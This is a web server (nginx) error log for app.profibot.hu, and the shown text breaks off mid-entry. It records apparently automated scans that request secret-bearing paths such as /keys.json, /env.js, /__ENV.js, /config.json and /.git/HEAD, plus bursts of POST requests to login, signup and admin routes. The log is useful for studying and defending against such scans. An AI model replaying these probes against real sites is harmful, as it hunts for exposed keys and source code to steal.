+2026/01/20 22:02:39 [error] 252#252: *6391 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_app/immutable/entry/app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_app/immutable/entry/app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6374 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /build/asset-manifest.json HTTP/1.1", upstream: "http://192.168.100.43:8000/build/asset-manifest.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6332 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/pages/_app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/pages/_app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6370 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /service-worker.js HTTP/1.1", upstream: "http://192.168.100.43:8000/service-worker.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6312 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /build/static/js/bundle.js HTTP/1.1", upstream: "http://192.168.100.43:8000/build/static/js/bundle.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6377 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_app/immutable/chunks/singletons.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_app/immutable/chunks/singletons.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6394 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /public/build/entry.client.js HTTP/1.1", upstream: "http://192.168.100.43:8000/public/build/entry.client.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6307 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /checkout.js HTTP/1.1", upstream: "http://192.168.100.43:8000/checkout.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6316 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /build/main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/build/main.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6314 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /dist/bundle.js HTTP/1.1", upstream: "http://192.168.100.43:8000/dist/bundle.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6356 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_nuxt/app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_nuxt/app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6393 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /public/build/manifest.json HTTP/1.1", upstream: "http://192.168.100.43:8000/public/build/manifest.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6361 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /asset-manifest.json HTTP/1.1", upstream: "http://192.168.100.43:8000/asset-manifest.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6401 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /svelte.config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/svelte.config.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6368 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /sw.js HTTP/1.1", upstream: "http://192.168.100.43:8000/sw.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6335 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /static/js/2.chunk.js HTTP/1.1", upstream: "http://192.168.100.43:8000/static/js/2.chunk.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6407 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /astro.config.mjs HTTP/1.1", upstream: "http://192.168.100.43:8000/astro.config.mjs", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6366 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /window.env.js HTTP/1.1", upstream: "http://192.168.100.43:8000/window.env.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6422 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/2.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/2.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6428 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/development/pages/_app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/development/pages/_app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6324 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /assets/js/main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/assets/js/main.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6362 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /cart HTTP/1.1", upstream: "http://192.168.100.43:8000/cart", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6387 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_app/immutable/chunks/index.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_app/immutable/chunks/index.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6364 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/_ssgManifest.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/_ssgManifest.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6359 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /manifest.json HTTP/1.1", upstream: "http://192.168.100.43:8000/manifest.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6435 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /@vite/client HTTP/1.1", upstream: "http://192.168.100.43:8000/@vite/client", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6434 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/1.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/1.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6389 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_app/immutable/entry/start.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_app/immutable/entry/start.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6321 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /build/static/js/main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/build/static/js/main.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6309 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /payment.js HTTP/1.1", upstream: "http://192.168.100.43:8000/payment.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6310 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /api.js HTTP/1.1", upstream: "http://192.168.100.43:8000/api.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6378 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /dist/.vite/manifest.json HTTP/1.1", upstream: "http://192.168.100.43:8000/dist/.vite/manifest.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6315 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/main.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6311 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /build/app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/build/app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6431 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /public/build/root.js HTTP/1.1", upstream: "http://192.168.100.43:8000/public/build/root.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6423 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/0.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/0.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6313 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /runtime.js HTTP/1.1", upstream: "http://192.168.100.43:8000/runtime.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6318 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /public/js/main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/public/js/main.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6371 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://192.168.100.43:8000/", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6319 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /build/bundle.js HTTP/1.1", upstream: "http://192.168.100.43:8000/build/bundle.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6322 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /dist/app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/dist/app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6430 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /index.html HTTP/1.1", upstream: "http://192.168.100.43:8000/index.html", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6416 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /public/page-data/app-data.json HTTP/1.1", upstream: "http://192.168.100.43:8000/public/page-data/app-data.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6437 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6402 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_astro/client.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_astro/client.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6403 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /dist/solid.js HTTP/1.1", upstream: "http://192.168.100.43:8000/dist/solid.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6365 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /keys.json HTTP/1.1", upstream: "http://192.168.100.43:8000/keys.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6358 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /payment HTTP/1.1", upstream: "http://192.168.100.43:8000/payment", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6420 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /assets/index.js HTTP/1.1", upstream: "http://192.168.100.43:8000/assets/index.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6414 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /.cache/page-ssr/routes/render-page.js HTTP/1.1", upstream: "http://192.168.100.43:8000/.cache/page-ssr/routes/render-page.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6397 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /remix.config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/remix.config.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6382 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /api/v1/config HTTP/1.1", upstream: "http://192.168.100.43:8000/api/v1/config", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6357 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /workbox.js HTTP/1.1", upstream: "http://192.168.100.43:8000/workbox.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6326 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /assets/js/app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/assets/js/app.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 252#252: *6348 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /src/constants.js HTTP/1.1", upstream: "http://192.168.100.43:8000/src/constants.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 250#250: *6347 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /config.json HTTP/1.1", upstream: "http://192.168.100.43:8000/config.json", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 250#250: *6417 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/framework.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/framework.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 252#252: *6346 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /__ENV.js HTTP/1.1", upstream: "http://192.168.100.43:8000/__ENV.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 250#250: *6412 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /static/js/5.chunk.js HTTP/1.1", upstream: "http://192.168.100.43:8000/static/js/5.chunk.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 252#252: *6344 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /static/js/runtime-main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/static/js/runtime-main.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 250#250: *6413 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /runtime~main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/runtime~main.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 252#252: *6424 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /assets/vendor.js HTTP/1.1", upstream: "http://192.168.100.43:8000/assets/vendor.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 250#250: *6338 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /js/config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/js/config.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 252#252: *6349 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/config.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 252#252: *6352 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /env-config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/env-config.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 251#251: *6410 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /.astro/types.d.ts HTTP/1.1", upstream: "http://192.168.100.43:8000/.astro/types.d.ts", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 252#252: *6306 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /keys.js HTTP/1.1", upstream: "http://192.168.100.43:8000/keys.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 251#251: *6345 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_nuxt/config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_nuxt/config.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 251#251: *6350 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /static/js/main.chunk.js HTTP/1.1", upstream: "http://192.168.100.43:8000/static/js/main.chunk.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 253#253: *6418 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /webpack.runtime.js HTTP/1.1", upstream: "http://192.168.100.43:8000/webpack.runtime.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 251#251: *6302 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /env.js HTTP/1.1", upstream: "http://192.168.100.43:8000/env.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 253#253: *6305 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /bundle.js HTTP/1.1", upstream: "http://192.168.100.43:8000/bundle.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 251#251: *6304 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /constants.js HTTP/1.1", upstream: "http://192.168.100.43:8000/constants.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 253#253: *6342 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /src/config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/src/config.js", host: "app.profibot.hu" +2026/01/20 22:02:40 [error] 253#253: *6336 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/webpack.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/webpack.js", host: "app.profibot.hu" +2026/01/20 23:35:30 [error] 258#258: *6762 connect() failed (111: Connection refused) while connecting to upstream, client: 23.27.145.170, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://192.168.100.43:8000/", host: "app.profibot.hu" +2026/01/20 23:40:30 [error] 258#258: *6770 connect() failed (111: Connection refused) while connecting to upstream, client: 84.254.106.197, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://192.168.100.43:8000/", host: "app.profibot.hu" +2026/01/20 23:40:31 [error] 258#258: *6770 connect() failed (111: Connection refused) while connecting to upstream, client: 84.254.106.197, server: app.profibot.hu, request: "GET /js/lkk_ch.js HTTP/1.1", upstream: "http://192.168.100.43:8000/js/lkk_ch.js", host: "app.profibot.hu" +2026/01/20 23:40:31 [error] 258#258: *6770 connect() failed (111: Connection refused) while connecting to upstream, client: 84.254.106.197, server: app.profibot.hu, request: "GET /js/twint_ch.js HTTP/1.1", upstream: "http://192.168.100.43:8000/js/twint_ch.js", host: "app.profibot.hu" +2026/01/20 23:40:31 [error] 258#258: *6770 connect() failed (111: Connection refused) while connecting to upstream, client: 84.254.106.197, server: app.profibot.hu, request: "GET /css/support_parent.css HTTP/1.1", upstream: "http://192.168.100.43:8000/css/support_parent.css", host: "app.profibot.hu" +2026/01/21 20:36:51 [error] 279#279: *20196 connect() failed (111: Connection refused) while connecting to upstream, client: 195.178.110.155, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://192.168.100.43:8000/", host: "app.profibot.hu" +2026/01/21 22:38:54 [error] 278#278: *23311 connect() failed (111: Connection refused) while connecting to upstream, client: 45.130.203.190, server: app.profibot.hu, request: "GET /.git/HEAD HTTP/1.1", upstream: "http://192.168.100.43:8000/.git/HEAD", host: "app.profibot.hu" +2026/01/22 19:01:59 [error] 337#337: *35218 upstream timed out (110: Connection timed out) while connecting to upstream, client: 37.76.12.67, server: app.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://192.168.100.43:8000/", host: "app.profibot.hu" +2026/01/23 22:10:34 [error] 345#345: *33439 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/*" failed (2: No such file or directory), client: 185.177.72.22, server: app.profibot.hu, request: "GET /.well-known/acme-challenge/* HTTP/1.1", host: "app.profibot.hu" +2026/01/26 10:22:01 [error] 232#232: *7477 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: app.profibot.hu, request: "GET /docs HTTP/1.1", host: "app.profibot.hu" +2026/01/26 10:22:03 [error] 232#232: *7477 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: app.profibot.hu, request: "GET /docs HTTP/1.1", host: "app.profibot.hu" +2026/01/26 10:22:18 [error] 232#232: *7477 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: app.profibot.hu, request: "GET /docs HTTP/1.1", host: "app.profibot.hu" +2026/01/26 10:22:20 [error] 232#232: *7477 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: app.profibot.hu, request: "GET /docs HTTP/1.1", host: "app.profibot.hu" +2026/01/26 10:28:51 [error] 237#237: *7513 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: app.profibot.hu, request: "GET /docs HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:54 [warn] 294#294: *17248 a client request body is buffered to a temporary file /tmp/nginx/body/8/43/0000007438, client: 213.209.159.181, server: app.profibot.hu, request: "POST / HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:54 [warn] 294#294: *17272 a client request body is buffered to a temporary file /tmp/nginx/body/9/43/0000007439, client: 213.209.159.181, server: app.profibot.hu, request: "POST /fr HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:54 [warn] 295#295: *17292 a client request body is buffered to a temporary file /tmp/nginx/body/0/44/0000007440, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/trpc HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:54 [warn] 294#294: *17290 a client request body is buffered to a temporary file /tmp/nginx/body/1/44/0000007441, client: 213.209.159.181, server: app.profibot.hu, request: "POST / HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:54 [warn] 292#292: *17307 a client request body is buffered to a temporary file /tmp/nginx/body/2/44/0000007442, client: 213.209.159.181, server: app.profibot.hu, request: "POST /en HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:54 [warn] 295#295: *17308 a client request body is buffered to a temporary file /tmp/nginx/body/3/44/0000007443, client: 213.209.159.181, server: app.profibot.hu, request: "POST /api/trpc HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:54 [warn] 295#295: *17309 a client request body is buffered to a temporary file /tmp/nginx/body/4/44/0000007444, client: 213.209.159.181, server: app.profibot.hu, request: "POST / HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:54 [warn] 292#292: *17324 a client request body is buffered to a temporary file /tmp/nginx/body/5/44/0000007445, client: 213.209.159.181, server: app.profibot.hu, request: "POST /en HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 292#292: *17340 a client request body is buffered to a temporary file /tmp/nginx/body/6/44/0000007446, client: 213.209.159.181, server: app.profibot.hu, request: "POST / HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 292#292: *17424 a client request body is buffered to a temporary file /tmp/nginx/body/7/44/0000007447, client: 213.209.159.181, server: app.profibot.hu, request: "POST /register HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 295#295: *17430 a client request body is buffered to a temporary file /tmp/nginx/body/8/44/0000007448, client: 213.209.159.181, server: app.profibot.hu, request: "POST /signup HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 295#295: *17423 a client request body is buffered to a temporary file /tmp/nginx/body/9/44/0000007449, client: 213.209.159.181, server: app.profibot.hu, request: "POST /register HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 295#295: *17425 a client request body is buffered to a temporary file /tmp/nginx/body/0/45/0000007450, client: 213.209.159.181, server: app.profibot.hu, request: "POST /es HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 295#295: *17429 a client request body is buffered to a temporary file /tmp/nginx/body/1/45/0000007451, client: 213.209.159.181, server: app.profibot.hu, request: "POST / HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 292#292: *17426 a client request body is buffered to a temporary file /tmp/nginx/body/2/45/0000007452, client: 213.209.159.181, server: app.profibot.hu, request: "POST /register HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 295#295: *17428 a client request body is buffered to a temporary file /tmp/nginx/body/3/45/0000007453, client: 213.209.159.181, server: app.profibot.hu, request: "POST /signup HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 295#295: *17422 a client request body is buffered to a temporary file /tmp/nginx/body/4/45/0000007454, client: 213.209.159.181, server: app.profibot.hu, request: "POST /es HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 292#292: *17427 a client request body is buffered to a temporary file /tmp/nginx/body/5/45/0000007455, client: 213.209.159.181, server: app.profibot.hu, request: "POST /es HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:55 [warn] 295#295: *17431 a client request body is buffered to a temporary file /tmp/nginx/body/6/45/0000007456, client: 213.209.159.181, server: app.profibot.hu, request: "POST /en HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:56 [warn] 295#295: *17484 a client request body is buffered to a temporary file /tmp/nginx/body/7/45/0000007457, client: 213.209.159.181, server: app.profibot.hu, request: "POST /dashboard HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:56 [warn] 294#294: *17486 a client request body is buffered to a temporary file /tmp/nginx/body/8/45/0000007458, client: 213.209.159.181, server: app.profibot.hu, request: "POST /_next/data HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:56 [warn] 292#292: *17491 a client request body is buffered to a temporary file /tmp/nginx/body/9/45/0000007459, client: 213.209.159.181, server: app.profibot.hu, request: "POST /_next/data HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:56 [warn] 292#292: *17487 a client request body is buffered to a temporary file /tmp/nginx/body/0/46/0000007460, client: 213.209.159.181, server: app.profibot.hu, request: "POST /signup HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:56 [warn] 293#293: *17504 a client request body is buffered to a temporary file /tmp/nginx/body/1/46/0000007461, client: 213.209.159.181, server: app.profibot.hu, request: "POST /dashboard HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:56 [warn] 292#292: *17508 a client request body is buffered to a temporary file /tmp/nginx/body/2/46/0000007462, client: 213.209.159.181, server: app.profibot.hu, request: "POST / HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:56 [warn] 294#294: *17522 a client request body is buffered to a temporary file /tmp/nginx/body/3/46/0000007463, client: 213.209.159.181, server: app.profibot.hu, request: "POST /dashboard HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:57 [warn] 293#293: *17593 a client request body is buffered to a temporary file /tmp/nginx/body/4/46/0000007464, client: 213.209.159.181, server: app.profibot.hu, request: "POST /admin HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:57 [warn] 292#292: *17602 a client request body is buffered to a temporary file /tmp/nginx/body/5/46/0000007465, client: 213.209.159.181, server: app.profibot.hu, request: "POST /login HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:57 [warn] 293#293: *17610 a client request body is buffered to a temporary file /tmp/nginx/body/6/46/0000007466, client: 213.209.159.181, server: app.profibot.hu, request: "POST /admin HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:57 [warn] 292#292: *17609 a client request body is buffered to a temporary file /tmp/nginx/body/7/46/0000007467, client: 213.209.159.181, server: app.profibot.hu, request: "POST /login HTTP/1.1", host: "app.profibot.hu" +2026/01/28 01:45:57 [warn] 294#294: *17611 a client request body is buffered to a temporary file /tmp/nginx/body/8/46/0000007468, client: 213.209.159.181, server: 